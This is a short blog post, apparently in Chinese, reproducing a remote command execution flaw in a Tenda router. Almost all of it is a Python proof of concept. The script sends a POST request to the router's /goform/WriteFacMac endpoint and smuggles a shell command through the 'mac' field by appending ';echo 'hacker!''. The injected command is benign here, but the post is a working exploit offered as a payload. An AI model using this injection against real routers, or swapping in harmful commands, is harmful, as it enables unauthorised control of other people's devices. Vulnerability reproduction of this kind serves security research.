Babing
Published on 2024-08-30 / 2 Visits
0
0

T8-2Tenda-路由器-RCE

T8-2Tenda-路由器-RCE

漏洞复现:

payload:

import requests

ip = '192.168.74.145'




url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)

Comment